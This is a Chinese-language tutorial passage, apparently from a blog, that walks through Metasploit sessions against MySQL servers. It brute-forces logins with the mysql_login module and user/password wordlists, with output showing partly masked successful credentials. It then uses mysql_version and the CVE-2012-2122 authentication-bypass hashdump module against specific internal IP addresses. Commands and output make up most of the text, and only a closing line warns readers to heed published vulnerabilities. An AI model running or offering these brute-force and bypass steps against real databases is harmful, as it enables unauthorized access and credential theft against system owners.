下面這個方式是普適的,但缺點就是必須要有自己的用戶名和密碼字典。其原理就是用user.txt與pass.txt的兩個文本去不停交叉驗證。
msf auxiliary(mysql_login) > use auxiliary/scanner/mysql/mysql_login msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 5 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts msf auxiliary(mysql_login) > set RHOSTS 10.199.169.160 RHOSTS => 10.199.169.160 msf auxiliary(mysql_login) > set RPORT 3307 RPORT => 3307 msf auxiliary(mysql_login) > set USER_FILE /home/user.txt USER_FILE => /home/user.txt msf auxiliary(mysql_login) > set PASS_FILE /home/pass.txt PASS_FILE => /home/pass.txt msf auxiliary(mysql_login) > msf auxiliary(mysql_login) > exploit [*] 10.199.169.160:3307 MYSQL - Found remote MySQL version 5.5.31 [-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: tms:root (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES)) [-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: tms:vipshop (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES)) [-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: tms:vipshop!@# (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES)) [-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: tms:cdtms (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES)) [-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: root:root (Incorrect: Access denied for user 'root'@'192.168.132.113' (using password: YES)) [+] 10.199.169.160:3307 MYSQL - Success: 'root:vi****p' [-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: cdtms:root (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES)) [-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: cdtms:vipshop (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES)) [-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: cdtms:vipshop!@# (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES)) [+] 10.199.169.160:3307 MYSQL - Success: 'cdt**s:cdt**s' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
另外,針對某些特定的Mysql版本,也可以采取一些特定的手段,比如Mysql的漏洞:CVE-2012-2122
假設我們得到了一個Mysql為5.1.61, 5.2.11, 5.3.5, 5.5.22的數據庫(下面這個只是操作過程,數據庫版本不是含漏洞版本)
msf > use auxiliary/scanner/mysql/mysql_version msf auxiliary(mysql_version) > show options Module options (auxiliary/scanner/mysql/mysql_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 3306 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(mysql_version) > set RHOSTS 10.199.128.61 RHOSTS => 10.199.128.61 msf auxiliary(mysql_version) > set THREADS 5 THREADS => 5 msf auxiliary(mysql_version) > exploit [*] 10.199.128.61:3306 is running MySQL 5.5.44-log (protocol 10) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
第一步就是獲取mysql version。第二步便配置Mysql的IP和端口就可以exploit了(事實上有IP足夠了,所有端口開放的服務都能掃描得到)
msf auxiliary(mysql_hashdump) > search CVE-2012-2122 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal MySQL Authentication Bypass Password Dump msf auxiliary(mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > msf auxiliary(mysql_authbypass_hashdump) > msf auxiliary(mysql_authbypass_hashdump) > show options Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 3306 yes The target port THREADS 1 yes The number of concurrent threads USERNAME root yes The username to authenticate as msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 10.199.128.61 RHOSTS => 10.199.128.61 msf auxiliary(mysql_authbypass_hashdump) > exploit [+] 10.199.128.61:3306 The server allows logins, proceeding with bypass test [*] 10.199.128.61:3306 Authentication bypass is 10% complete [*] 10.199.128.61:3306 Authentication bypass is 20% complete [*] 10.199.128.61:3306 Authentication bypass is 30% complete [*] 10.199.128.61:3306 Authentication bypass is 40% complete [*] 10.199.128.61:3306 Authentication bypass is 50% complete [*] 10.199.128.61:3306 Authentication bypass is 60% complete [*] 10.199.128.61:3306 Authentication bypass is 70% complete [*] 10.199.128.61:3306 Authentication bypass is 80% complete [*] 10.199.128.61:3306 Authentication bypass is 90% complete [*] 10.199.128.61:3306 Authentication bypass is 100% complete [-] 10.199.128.61:3306 Unable to bypass authentication, this target may not be vulnerable [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
然后這樣就這么簡單,你會得到一個用戶名和密碼。
-------------------
想想看,假設你的數據庫有漏洞,別人有你一個公網IP,就能獲取你的數據庫信息。。。所以,網上公布重大漏洞時,不要置身事外。